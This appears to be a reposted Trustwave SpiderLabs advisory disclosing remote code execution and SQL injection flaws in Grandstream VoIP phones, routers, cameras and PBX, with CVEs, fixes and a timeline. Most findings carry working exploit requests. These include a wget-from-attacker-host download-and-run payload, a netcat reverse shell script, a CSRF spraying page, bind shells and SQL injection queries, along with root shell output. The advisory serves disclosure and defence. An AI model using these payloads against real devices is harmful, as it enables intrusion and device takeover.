GrandstreamExploitsثغرات

Trustwave SpiderLabs Security Advisory TWSL2019-003:
Multiple Vulnerabilities in Grandstream Products
Published: 04/05/2019
Version: 3.0
Vendor: Grandstream (http://www.grandstream.com/)
Product: Audio/Video/Voip/Routers/Security Cameras
Version affected:
Pre-auth RCE:
GAC2500 -- F/W version: 1.0.3.35
GVC3202 -- F/W version: 1.0.3.51
GXP2200 -- F/W version: 1.0.3.27 (end of life product)
GXV3275 -- F/W version: 1.0.3.210
GXV3240 -- F/W version: 1.0.3.210
Post Auth RCE:

GXV3611IR_HD -- F/W version: 1.0.3.21
UCM6204 � F/W version: 1.0.18.12
GXV3370 -- F/W version: 1.0.1.33
WP820 -- F/W version: 1.0.1.15
GWN7000 -- F/W version: 1.0.4.12
GWN7610 -- F/W version: 1.0.8.9
Product description:
Various networking and communication solutions.
Finding 1: Unauthenticated Remote Code Execution for Multiple Grandstream Devices

Credit: Brendan Scarvell of Trustwave
CVE: CVE-2019-10655
The following Grandstream devices are vulnerable to unauthenticated remote code

execution by the combination of a command injection vulnerability and an
authentication bypass:
- GAC2500 (Audio Conferencing Unit) firmware versions 1.0.3.35 and prior

- GVC3202 (Video Conferencing Unit) firmware versions 1.0.3.51 and prior
- GXV3240 (VoIP Phone) firmware versions 1.0.3.210 and prior
- GXV3275 (VoIP Phone) firmware versions 1.0.3.210 and prior
- GXP2200 (VoIP Phone - End of Life Product) firmware versions 1.0.3.27 and prior
The "priority" parameter of the getlogcat API endpoint is vulnerable to a

command injection vulnerability, resulting in a root shell:
Request:
===========================
GET /manager?
action=getlogcat&region=maintenance&tag=&priority=;reboot;&time=1543915668008
HTTP/1.1
Host: 10.0.0.34
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101
Firefox/63.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.34/maintenance/logcat.html?ver=1.0.3.51
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: MyLanguage=en; phonecookie="66e67eb1"; type=admin; Version="1"; Max-
Age=900; tooltipdiv_closed=true; tooltipdiv_iconized=dock; needchange=1;
ver=1.0.3.51; logindate=1543915659757; logout=-1; Mainpage=maintenance;
Subpage=logcat
When entering an invalid phonecookie value, the server correctly denies access
to the the API endpoints:
Request:
===========================
GET /manager?action=getlogcat&region=maintenance&tag=&priority=;{wget,http://
attacker/x.sh,-O,/data/x.sh};chmod$IFS+x$IFS/data/x.sh;/data/
x.sh;&time=1543915668008 HTTP/1.1
Host: 10.0.0.34
Firefox/63.0
Connection: close
Cookie: MyLanguage=en; phonecookie="AABBCCDD"; type=admin; Version="1"; Max-
Age=900; tooltipdiv_closed=true; tooltipdiv_iconized=dock; needchange=1;
ver=1.0.3.51; logindate=1543915659757; logout=-1; Mainpage=maintenance;
Subpage=logcat
Response:
===========================
HTTP/1.1 200 OK
Content-Type: text/plain
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 49
Connection: close
Date: Tue, 04 Dec 2018 09:29:11 GMT
Server: IP Video Conferencing
Response=Error
Message=Authentication Required
However, by supplying 93 A's in the "phonecookie" Cookie, it will result in a

buffer overflow and overwrite the return value for the valid_connection
function, returning 41 instead of 0. This bypasses the authentication checks in
place and now allows the previous command injection vulnerability to be
triggered as an unauthenticated user.
Request:
===========================
GET /manager?action=getlogcat&region=maintenance&tag=&priority=;{wget,http://
attacker/x.sh,-O,/data/x.sh};chmod$IFS+x$IFS/data/x.sh;/data/
x.sh;&time=1543915668008 HTTP/1.1
Host: 10.0.0.34
Firefox/63.0
Connection: close
Cookie: MyLanguage=en;
phonecookie="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAA"; type=admin; Version="1"; Max-Age=900;
tooltipdiv_closed=true; tooltipdiv_iconized=dock; needchange=1; ver=1.0.3.51;
logindate=1543915659757; logout=-1; Mainpage=maintenance; Subpage=logcat
--------------------
mnz@anima:~/projects/grandstream/gvc3202$ nc -klvp 4444

Listening on [0.0.0.0] (family 0, port 4444)
Connection from 10.0.0.34 44947 received!
sh: can't access tty; job control turned off
/ # id
uid=0(root) gid=0(root)
/ # cat /system/root/.ssh/authorized_keys
Public key portion is:
ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAAAglJliLIaeVoAC5/d7maJWH897v/QSpfywsmfwcl+ftyTN4uVdLHrfG3
yO6NOjvE0uy4t10E+OA8zsJmoa4Y7q6oROjlOZKYfizr1i1unD6KK6YpQoDcYNZo62fR/
LqenTnXG1eHCzT4RIWge6GXe6IGst+oJyY0QjF2lDowXNi0edlE= kehua@kehua-desktop
Fingerprint: md5 aa:47:1b:90:56:8f:e8:29:8d:f4:76:4b:66:fc:91:62

ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAABAmOqFoPWqhM0WlxSj56up/avu3DjMT2Rh8xDGLqVUjGz5Yttl2ozxZ5
ZjeraEJvIjwANK7FnCxsE1BF+9+2MBSxvu1DQyyI2Iy7TcXMP08PcCPJhfHp/
+wlCYdUnsJifvxSt49IuS09Ax0lPZuegU+UfXoBbGtIJ5Q1jC78L49pDClQMWIqlGRzMFvbA/
KpHVFuUD+zGEAHrGKiEFDRbaPTCkmpxr4RYocE6P8RDkj0Ae71FuxXvxlYUr7+ikffKAvPtwBX5YsSZ4hBj
XhX8F64StCJbVYI5CdZUBu2E4mbrirRkB8gHpAfc/Qq1/bNp+Pxi5JcZdpDDeht/6ZJI6snrbw==
jacky@jacky-Lenovo
Fingerprint: md5 9e:1e:13:ab:fa:b2:ab:97:bb:31:60:d2:49:48:15:ff
/ #
--------------------
Additionally, the lighttpd binary doesn't check that "phonecookie" is actually

in the cookie request header and can be sent in any header.
As long as you only do a so-called "simple request"

(https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS?
fbclid=IwAR3gBKDUD4oK64oxXhGoFCYo-
uhOYTRMIaW5IFsnxMEw6A4KPFNfJ7btLQ8#Simple_requests),
a CORS preflight won't occur. XHR can be used to set "phonecookie" in some of
these safe request headers, allowing the unauth RCE to now be CSRF sprayed to
gain a reverse shell on non public facing devices.
The following proof of concept shows how a malicious HTML page could be used to try
and CSRF this:
<script>
for (var i = 0; i < 254; i++) {
(function(i){
var oReq = new XMLHttpRequest();
oReq.open("GET", "http://10.0.0."+i+"/manager?
action=getlogcat&region=maintenance&tag=&priority=;{wget,http://attacker/x.sh,-O,/
data/x.sh};chmod$IFS+x$IFS/data/x.sh;/data/x.sh;&time=1543909525160 ");
oReq.setRequestHeader("Accept","phonecookie=\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\";");
oReq.send();
})(i);
}
</script>
The contents of x.sh is as follows:
mnz@anima:~/projects/grandstream/gvc3202$ cat x.sh

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.0.0.53 4444>/tmp/f;
Finding 2: Remote Code Execution in Grandstream's GWN7000 (Gigabit VPN router)

CVE: CVE-2019-10656, CVE-2019-10657
Grandstream's GWN7000 (Gigabit VPN router) firmware 1.0.4.12 and prior is

vulnerable to remote code execution by exploiting a post auth command injection
vulnerability.
The "filename" parameter in the update_nds_webroot_from_tmp API call is

vulnerable to a blind command injection vulnerability resulting in a root shell:
Request:
===========================
POST /ubus/uci.apply HTTP/1.1
Host: 192.168.1.1
Firefox/63.0
Accept: application/json, text/javascript, */*; q=0.01
Referer: https://192.168.1.1/
Content-Type: application/json
Content-Length: 179
Connection: close
Cookie: userid=c99bfb25d88ce13d021e55b2ac2014a2; user=admin
{"jsonrpc":"2.0","id":127,"method":"call","params":
["c99bfb25d88ce13d021e55b2ac2014a2","controller.icc","update_nds_webroot_from_tmp",
{"filename":"/hihi.html';telnetd -lsh;#"}]}
Response:
===========================
HTTP/1.1 200 OK
Connection: close
Content-Length: 52
{"jsonrpc":"2.0","id":127,"result":[0,{"status":0}]}
--------------------
mnz@anima:~/projects/grandstream/gwn7000$ telnet 192.168.1.1

Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
BusyBox v1.23.2 (2017-02-24 16:54:38 CST) built-in shell (ash)
/ # id
/ #
This area of functionality is only visible via the UI as admin, however the
'user' account is able to still hit this API endpoint. Additionally, it's
possible for the 'user' account to retrieve the password in plaintext for the
admin user (as well as the rest of the device settings) by the following
request. The user can then simply just login as admin.
Request:
===========================
POST /ubus/uci.apply HTTP/1.1
Host: 192.168.1.1
Firefox/63.0
Content-Length: 123
Connection: close
Cookie: userid=c847182f49ab267ff55d0870076a26c9; user=user
["c847182f49ab267ff55d0870076a26c9","uci","get",{"config":"grandstream"}]}
Response:
===========================
HTTP/1.1 200 OK
Connection: close
Content-Length: 9574
{"jsonrpc":"2.0","id":7,"result":[0,{"values":{"debug":
{".anonymous":false,".type":"debug",".name":"debug",".index":0,"syslog_level":"1","
logserver_file_size":"5M","logserver_file_count":"56","logserver_rotate_mode":"1"},
"general":
{".anonymous":false,".type":"general",".name":"general",".index":1,"password_change
_required":"1","ntp_server":
["129.6.15.28"],"date_display":"0","role":"0","enable_sip_alg":"0","applied_patch":
"1","web_wan_http":"1","pairing_key":"d[1#O+]LDp$?xFjY>kg$->j{``mu]=v;imuTM
9dfI}=(^1X+Wypr{a|CkYlt`9","failover_key":"H}um{L6@NQXhWdK|sqen7aHT_PuzY] L
Vd@>.Wf8]V\\
N=JA\"i(MtWET374jU}8","admin_password":"Password1","user_password":"Password1","web
_port":"443"
[...]
Finding 3: Remote Code Execution Grandstream's GWN7610 (Wireless Access Point)

CVE: CVE-2019-10658
Grandstream's GWN7610 (Wireless Access Point) firmware version 1.0.8.9 and prior
is vulnerable to remote code execution by exploiting a post auth command
injection vulnerability.
The "filename" parameter of the update_nds_webroot_from_tmp API call is

vulnerable to a blind command injection vulnerability.
Request:
===========================
POST /ubus/controller.icc.update_nds_webroot_from_tmp HTTP/1.1
Host: 10.0.0.128
Firefox/63.0
Content-Length: 177
Connection: close
Cookie: userid=817309838e44d88e62534d563598e60a; user=admin
["817309838e44d88e62534d563598e60a","controller.icc","update_nds_webroot_from_tmp",
{"filename":"/hihi.html';telnetd -lsh;#"}]}
Response:
===========================
HTTP/1.1 200 OK
Connection: close
Content-Length: 52
{"jsonrpc":"2.0","id":127,"result":[0,{"status":0}]}
--------------------
mnz@anima:~/projects/grandstream/gwn7610$ telnet 10.0.0.128

Trying 10.0.0.128...
BusyBox v1.23.2 (2018-11-15 15:02:01 CST) built-in shell (ash)

/ # id
/ #
The update_nds_webroot_from_tmp API call is restricted to the admin account,

however, it's possible for the 'user' account to simply retrieve the password in
plaintext for the admin user (as well as the rest of the device settings) by
issuing the following request:
Request:
===========================
POST /ubus/uci.get HTTP/1.1
Host: 10.0.0.128
Firefox/63.0
Content-Length: 123
Connection: close
Cookie: userid=452a422c775b1176109da724a7bb5c44; user=user
["452a422c775b1176109da724a7bb5c44","uci","get",{"config":"grandstream"}]}
Response:
===========================
HTTP/1.1 200 OK
Connection: close
{"jsonrpc":"2.0","id":7,"result":[0,{"values":{"debug":
{".anonymous":false,".type":"debug",".name":"debug",".index":0,"syslog_level":"1","
syslog_uri":"10.0.0.125","log_level":"7"},
"general":
{".anonymous":false,".type":"general",".name":"general",".index":1,"ntp_server":
["129.6.15.28"],"date_display":"0","role":"0","country":"840","applied_patch":"1","
admin_password":"Password1","user_password":"Password1","pairing_key"
[...]
Finding 4: Remote Code Execution in Grandstream's GXV3370 (VoIP Phone)

CVE: CVE-2019-10659
Grandstream's GXV3370 (VoIP Phone) firmware version 1.0.1.33 and prior is

vulnerability.
The "priority" parameter of the getlogcat API endpoint is vulnerable to a command

injection vulnerability
resulting in a root shell:

mnz@anima:~/projects/grandstream/wp820$ cat x.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|busybox nc 10.0.0.53 4444>/tmp/f;
Request:
===========================
GET /manager?action=getlogcat&tag=&priority=;{wget,http://attacker/x.sh,-O,/data/
x.sh};chmod$IFS+x$IFS/data/x.sh;/data/x.sh;&_=1543919505566 HTTP/1.1
Host: 10.0.0.74
Firefox/63.0
Referer: http://10.0.0.84/
Connection: close
Cookie: MyLanguage=en; phonecookie="47028427"; type=admin; Version="1"; Max-
Age=900; needchange=0; ver=1.0.1.15; logindate=1543919482990
----------------------------
mnz@anima:~/projects/grandstream/gxv3370$ nc -klvp 4444

sh: can't find tty fd: No such device or address
sh: warning: won't have full job control
GXV3370:/ # id
uid=0(root) gid=0(root) groups=0(root) context=u:r:toolbox:s0
GXV3370:/ # cat /system/root/.ssh/authorized_keys
ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAABAla/bO1oj2G8FOcx+uFmVGeZTkJQ5R1yJc1HphyqcE4LuEoMJ+2KWIT
mP4ADe8etTd/ZjqkL+eeN+Terj4Z+pMXk40yoRw5+R6QBW1u1XZ/4GnHWoang9+44GQ4E+ZyGD6ba8tA/
gXewS9gf/
+XRqX5A321ol4KynLsYZ9+BLXpKGGf3dUc1HSZeeV0W1UvlGLHnzR1uBFueS8h5NrUpBkIEwfxYiLB3mDpR
C0OpGrW2QK56dr7r3/DNPWZFtT3iBoiyrnv8oR/w3C2CiVTJdtnweYkl0yXMIxN/
FEGRvVXCloIiEphcyXZlZHPtzO1uI1tftW2I6WdQEIAScOlDt9PJdQ== root@ub64-QiTianM4500-N000
Fingerprint: md5 98:ef:a2:13:27:60:14:d5:6a:8b:93:7a:5b:07:08:0f
GXV3370:/ #
------------------------------
Finding 5: Remote Code Execution in Grandstream's GXV3611IR_HD (IP Camera)

CVE: CVE-2019-10660, CVE-2019-10661
Grandstream's GXV3611IR_HD (IP Camera) firmware version 1.0.3.21 and prior is

vulnerability.
The "logserver" parameter of the "systemlog" API endpoint is vulnerable to a

command injection vulnerability resulting in a telnet server running. The root
account has no password.
Request:
===========================
GET /goform/systemlog?cmd=set&logserver=127.0.0.1%253Btelnetd%2524IFS-
p5555&loglevel=0 HTTP/1.1
Host: 10.0.0.135
Firefox/63.0
Accept: */*
Referer: http://10.0.0.135/Pages/syslog.html
cache-control: no-cache
context-type: text/xml;charset=utf-8
Content-Type: application/x-www-form-encodeURIComponent
If-Modified-Since: 0
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
----------------------------
mnz@anima:~/projects/grandstream/gxv3611IR_HD$ telnet 10.0.0.135 5555

Trying 10.0.0.135...
MontaVista(R) Linux(R) Professional Edition 5.0.0 (0702774)

Linux/armv5tejl 2.6.18_pro500-davinci_evm-arm_v5t_le
localhost login: root
Welcome to MontaVista(R) Linux(R) Professional Edition 5.0.0 (0702774).
BusyBox v1.2.2 (2016.11.21-17:40+0000) Built-in shell (ash)

Enter 'help' for a list of built-in commands.
id: applet not found

id: applet not found
#
----------------------------
Finding 6: Remote Code Execution in Grandstream's UCM6204 (IP PBX)

CVE: CVE-2019-10662, CVE-2019-10663
Grandstream's UCM6204 (IP PBX) firmware version 1.0.18.12 and prior is

vulnerability.
The "file-backup" parameter of the backupUCMConfig API call is vulnerable to a

blind command injection vulnerability.
Request:
===========================
POST /cgi? HTTP/1.1
Host: 10.0.0.65:8089
Firefox/63.0
Accept: */*
Referer: https://10.0.0.65:8089/system-status/dashboard
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 78
Connection: close
Cookie: TRACKID=48c52904a59538eb8c50288d6ebab821; session-identify=sid1287358962-
1543933269; username=admin; user_id=0
action=backupUCMConfig&file-backup=backup_20181129_224405;reboot;.tar;+realtime
Request:
===========================
POST /cgi? HTTP/1.1
Host: 10.0.0.65:8089
Firefox/63.0
Accept: */*
Content-Length: 126
Connection: close
action=backupUCMConfig&file-backup=backup_20181129_224405;x=$'busybox\x20nc\x20-l\
x20-p\x201337\x20-e\x20sh';$x;.tar;+realtime
Then simply connect to the device for root shell:
------------------------------
mnz@anima:~/projects/grandstream/ucm6204$ nc 10.0.0.65 1337

id
uid=0(root) gid=0(root) groups=0(root)
------------------------------
Additionally, the "sord" parameter of the listCodeblueGroup is vulnerable to SQL

injection.
Request:
===========================
POST /cgi? HTTP/1.1
Host: 10.0.0.65:8089
Firefox/63.0
Accept: */*
Content-Length: 116
Connection: close
action=listCodeblueGroup&item_num=10&page=1&sord=asc;select null,"noot
noot",sqlite_version(),null;--&sidx=extension
Response:
===========================
HTTP/1.1 200 OK
Content-Type: application/json;charset=UTF-8
Server: Asterisk/1.8.9
Content-Length: 258
Connection: close
Date: Tue, 04 Dec 2018 14:40:26 GMT
{ "response": { "codeblue_group": [ { "extension": "2", "group_name": "apples",

"members": "1001", "tmp": "2" }, { "extension": null, "group_name": "noot noot",
"members": "3.8.5", "tmp": null } ], "total_item": 1, "total_page": 1, "page": 1 },
"status": 0 }
Request:
===========================
POST /cgi? HTTP/1.1
Host: 10.0.0.65:8089
Firefox/63.0
Accept: */*
Content-Length: 119
Connection: close
action=listCodeblueGroup&item_num=10&page=1&sord=asc;select null,null,tbl_name,null
FROM sqlite_master--&sidx=extension
Response:
===========================
HTTP/1.1 200 OK
Content-Type: application/json;charset=UTF-8
Server: Asterisk/1.8.9
Connection: close
Date: Tue, 04 Dec 2018 14:44:04 GMT
{ "response": { "codeblue_group": [ { "extension": "2", "group_name": "apples",
"members": "1001", "tmp": "2" }, { "extension": null, "group_name": null,
"members": "privilege", "tmp": null }, { "extension": null, "group_name": null,
"members": "languages", "tmp": null }, { "extension": null, "group_name": null,
"members": "languages", "tmp": null }, { "extension": null, "group_name": null,
"members": "language_settings", "tmp": null }, { "extension": null, "group_name":
null, "members": "sqlite_sequence", "tmp": null }, { "extension": null,
"group_name": null, "members": "numbers", "tmp": null }, { "extension": null,
"group_name": null, "members": "numbers", "tmp": null }, { "extension": null,
"group_name": null, "members": "dhcp_settings", "tmp": null }, { "extension": null,
"group_name": null, "members": "dhcp6_settings", "tmp": null }, { "extension":
null, "group_name": null, "members": "static_routes", "tmp": null }, { "extension":
null, "group_name": null, "members": "static_routes", "tmp": null }, { "extension":
null, "group_name": null, "members": "ipv6_static_routes", "tmp": null },
{ "extension": null, "group_name": null, "members": "ipv6_static_routes", "tmp":
null }, { "extension": null, "group_name": null, "members":
"typical_firewallsettings", "tmp": null }, { "extension": null, "group_name": null,
"members": "static_defense", "tmp": null }, { "extension": null, "group_name":
null, "members": "static_defense", "tmp": null }, { "extension": null,
"group_name": null, "members": "static_defense", "tmp": null }, { "extension":
null, "group_name": null, "members": "blacklist", "tmp": null }
[...]
Finding 7: Grandstream's WP820 (WiFi Phone)

CVE: CVE-2019-10658
Grandstream's WP820 (WiFi Phone) firmware version 1.0.1.15 and prior is

vulnerability.
The "priority" parameter of the getlogcat API endpoint is vulnerable to a

command injection vulnerability resulting in a root shell:
mnz@anima:~/projects/grandstream/wp820$ cat x.sh

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|busybox nc 10.0.0.53 4444>/tmp/f;
Request:
===========================
GET /manager?action=getlogcat&tag=&priority=;{wget,http://attacker/x.sh,-O,/data/
x.sh};chmod$IFS+x$IFS/data/x.sh;/data/x.sh;&_=1543919505566 HTTP/1.1
Host: 10.0.0.84
Firefox/63.0
Referer: http://10.0.0.84/
Connection: close
Cookie: MyLanguage=en; phonecookie="7672db95"; type=admin; Version="1"; Max-
Age=900; needchange=0; ver=1.0.1.15; logindate=1543919482990
----------------------------
mnz@anima:~/projects/grandstream/wp820$ nc -klvp 4444

sh: can't find tty fd: No such device or address
sh: warning: won't have full job control
WP820:/ # id
uid=0(root) gid=0(root) groups=0(root) context=u:r:toolbox:s0
WP820:/ # cat /system/root/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAmwladAFNFrfljVgMKFzX5JGMKh+lUa1SD+9M2xij2KQ0/
J9rWtwy/
O7AIGtUwE32jCQ8Qnf6ObmjtIGn0rmVdl7WJ3pGveeRHGjZN8vBSAnP+eXSeVFFcGzUXKlpByqiJ+Z8rPh2
nr/TDioAA6M/bfLB643qbFzqREZX678bO6yvbLI9zfexpngT/cq3BT7gCaAHZ8oI+j8rb+YSP/
tj0s31E0TIUsD2r/
LueRvHRXjXBfl3FOaatwXwHiKXge+qs9RfidnAwFYlcH3D5UleBVdkzsT3HOWmij0O/
xtsUVixz3HJmZNNtT6m/9qiEj4jAcU/c6SYjeF3p/FbkggUt7M8Q== xtli@time-machine
Fingerprint: md5 c4:20:ea:09:79:3c:f6:71:90:db:ae:e9:8c:16:c4:90
WP820:/ #
------------------------------
Remediation Steps:
Ensure all devices are up-to-date and running the latest firmware; turn on
automatic updates; change all default credentials on the devices for all accounts;
run the devices on a separate network from those accessing sensitive information;
disabling access to all services that aren�t required on the device; and upgrading
any end-of-life devices that are no longer receiving security updates.
The firmware versions that were released to address these findings include:
Pre Auth RCE

GAC2500 -- fixed in firmware 1.0.3.37 (Beta)
GXP2200 -- no plan to fix due to discontinued product
GVC3202 -- Plan to be fixed in next firmware release
GXV3275 -- fixed in firmware 1.0.3.219 (Beta)
Post Auth RCE

GXV3611IR_HD -- fixed in firmware 1.0.3.23
UCM6204 -- fixed in firmware 1.0.19.20 (Beta)
WP820 -- fixed in firmware 1.0.3.6
GWN7000 -- fixed in firmware 1.0.6.32
GWN7610 -- fixed in firmware 1.0.8.18
Please note that Trustwave has not verified all the vendor supplied fixes.
Revision History:
12/06/2018 : Vulnerabilities disclosed to vendor
02/11/2019 : Vendor announces firmware updates for all except GWN7000, GVC3202
03/01/2019 : Vendor announces firmware updates available for GWN7000
03/22/2019 : Advisory 1.0 published
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave SpiderLabs:

SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.

GrandstreamExploitsثغرات

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

GrandstreamExploitsثغرات

Uploaded by

Copyright:

Available Formats

Trustwave SpiderLabs Security Advisory TWSL2019-003:

Multiple Vulnerabilities in Grandstream Products

Post Auth RCE:

Finding 1: Unauthenticated Remote Code Execution for Multiple Grandstream Devices

The following Grandstream devices are vulnerable to unauthenticated remote code

- GAC2500 (Audio Conferencing Unit) firmware versions 1.0.3.35 and prior

The "priority" parameter of the getlogcat API endpoint is vulnerable to a

However, by supplying 93 A's in the "phonecookie" Cookie, it will result in a

mnz@anima:~/projects/grandstream/gvc3202$ nc -klvp 4444

Public key portion is:

Additionally, the lighttpd binary doesn't check that "phonecookie" is actually

As long as you only do a so-called "simple request"

The contents of x.sh is as follows:

mnz@anima:~/projects/grandstream/gvc3202$ cat x.sh

Finding 2: Remote Code Execution in Grandstream's GWN7000 (Gigabit VPN router)

Grandstream's GWN7000 (Gigabit VPN router) firmware 1.0.4.12 and prior is

The "filename" parameter in the update_nds_webroot_from_tmp API call is

mnz@anima:~/projects/grandstream/gwn7000$ telnet 192.168.1.1

BusyBox v1.23.2 (2017-02-24 16:54:38 CST) built-in shell (ash)

Finding 3: Remote Code Execution Grandstream's GWN7610 (Wireless Access Point)

The "filename" parameter of the update_nds_webroot_from_tmp API call is

mnz@anima:~/projects/grandstream/gwn7610$ telnet 10.0.0.128

BusyBox v1.23.2 (2018-11-15 15:02:01 CST) built-in shell (ash)

The update_nds_webroot_from_tmp API call is restricted to the admin account,

Finding 4: Remote Code Execution in Grandstream's GXV3370 (VoIP Phone)

Grandstream's GXV3370 (VoIP Phone) firmware version 1.0.1.33 and prior is

The "priority" parameter of the getlogcat API endpoint is vulnerable to a command

The contents of x.sh is as follows:

mnz@anima:~/projects/grandstream/gxv3370$ nc -klvp 4444

Finding 5: Remote Code Execution in Grandstream's GXV3611IR_HD (IP Camera)

Grandstream's GXV3611IR_HD (IP Camera) firmware version 1.0.3.21 and prior is

The "logserver" parameter of the "systemlog" API endpoint is vulnerable to a

mnz@anima:~/projects/grandstream/gxv3611IR_HD$ telnet 10.0.0.135 5555

MontaVista(R) Linux(R) Professional Edition 5.0.0 (0702774)

localhost login: root

Welcome to MontaVista(R) Linux(R) Professional Edition 5.0.0 (0702774).

BusyBox v1.2.2 (2016.11.21-17:40+0000) Built-in shell (ash)

id: applet not found

Finding 6: Remote Code Execution in Grandstream's UCM6204 (IP PBX)

Grandstream's UCM6204 (IP PBX) firmware version 1.0.18.12 and prior is

The "file-backup" parameter of the backupUCMConfig API call is vulnerable to a

Then simply connect to the device for root shell:

mnz@anima:~/projects/grandstream/ucm6204$ nc 10.0.0.65 1337

Additionally, the "sord" parameter of the listCodeblueGroup is vulnerable to SQL

{ "response": { "codeblue_group": [ { "extension": "2", "group_name": "apples",

Finding 7: Grandstream's WP820 (WiFi Phone)

Grandstream's WP820 (WiFi Phone) firmware version 1.0.1.15 and prior is

The "priority" parameter of the getlogcat API endpoint is vulnerable to a

The contents of x.sh is as follows:

mnz@anima:~/projects/grandstream/wp820$ cat x.sh

mnz@anima:~/projects/grandstream/wp820$ nc -klvp 4444

Pre Auth RCE

Post Auth RCE

About Trustwave SpiderLabs:

You might also like